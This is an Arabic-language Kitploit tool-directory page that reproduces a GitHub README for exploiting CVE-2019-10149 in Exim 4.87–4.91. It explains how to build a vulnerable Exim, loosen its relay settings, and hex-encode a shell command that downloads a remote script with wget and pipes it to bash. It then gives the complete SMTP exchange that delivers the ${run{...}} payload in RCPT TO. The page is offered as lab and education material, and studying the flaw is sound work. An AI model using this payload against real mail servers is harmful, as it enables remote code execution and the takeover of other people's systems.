Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-10149 — تعليمات لتثبيت نسخة ضعيفة من Exim واستغلالها | Kitploit
أدوات/GitHubGitHub/darsigovrustam/cve-2019-10149
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأمان البريد الإلكترونيمختبرات وتدريب عملي
GitHubdarsigovrustam/cve-2019-10149

CVE-2019-10149

تعليمات لتثبيت نسخة ضعيفة من Exim واستغلالها

عرض المستودع
53منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-10149 - Exim 4.87 < 4.91

تعليمات تثبيت إصدار ضعيف من Exim واستغلاله تم الاختبار على Linux Ubuntu 16.04، Exim 4.89

تثبيت Exim

تنزيل واستخراج إصدار exim 4.89

  • wget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz

الانتقال إلى المجلد المستخرج

  • cd exim-4.89/

نسخ وتعديل ملفات الإعدادات المطلوبة

  • sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile

  • cp exim_monitor/EDITME Local/eximon.conf

إنشاء مستخدم ومجموعة exim

  • sudo groupadd -g 31 exim

  • sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim

تثبيت التبعيات

  • sudo apt-get update
  • sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev

تثبيت exim 4.89

  • sudo make install

تحرير /usr/exim/configure للسماح بالترحيل حتى نتمكن من الاستغلال دون انتظار 7 أيام

  • sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = * /' /usr/exim/configure
  • sudo sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = 0.0.0.0' /usr/exim/configure
  • sudo sed -i '/require verify = recipient/c#require verify = recipient' /usr/exim/configure

تشغيل exim كمستخدم exim

  • sudo -H -u exim /usr/exim/bin/exim -bd -d-receive

صياغة الاستغلال

تحويل أمر الشل الخاص بك إلى ست عشري. مثال:

  • /bin/sh -c “wget https://raw.githubusercontent.com/darsigovrustam/CVE-2019-10149/master/RemoteConnection.sh" -O - | bash
  • \x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\

جدول مثال:

  • \t-c\ = -c
  • \t= مسافة
  • x20 = مسافة
  • x7C = |
  • x2F = /
  • x3A = :
  • x2D = -
  • x3E = >
  • x26 = &
  • x22 = "
  • x2E = .

استخدام الاستغلال

أولاً نستخدم nc لبدء اتصال بالخادم.

  • nc 192.168.0.168 25

بمجرد الاتصال نقول HELO.

  • helo localhost
  • (الإجابة: 250 exim Hello localhost [192.168.0.168])

بعد ذلك، نضبط عنوان المرسل على فارغ.

  • mail from:<>
  • (الإجابة: 250 OK)

ثم نضبط عنوان المستلم مع الحمولة التي أنشأناها سابقًا بإدخال الأمر المطلوب مكان النقاط في rcpt to:${run{...}}@localhost.

  • rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22}}@localhost>
  • (الإجابة: 250 Accepted)

وأخيرًا، نكتب DATA أولاً، متبوعة بـ 31 سطرًا، وسطر فارغ، ونقطة.

  • DATA
  • Received: 1
  • Received: 2
  • Received: 3
  • Received: 4
  • Received: 5
  • Received: 6
  • Received: 7
  • Received: 8
  • Received: 9
  • Received: 10
  • Received: 11
  • Received: 12
  • Received: 13
  • Received: 14
  • Received: 15
  • Received: 16
  • Received: 17
  • Received: 18
  • Received: 19
  • Received: 20
  • Received: 21
  • Received: 22
  • Received: 23
  • Received: 24
  • Received: 25
  • Received: 26
  • Received: 27
  • Received: 28
  • Received: 29
  • Received: 30
  • Received: 31
  • .
تنزيل الأداة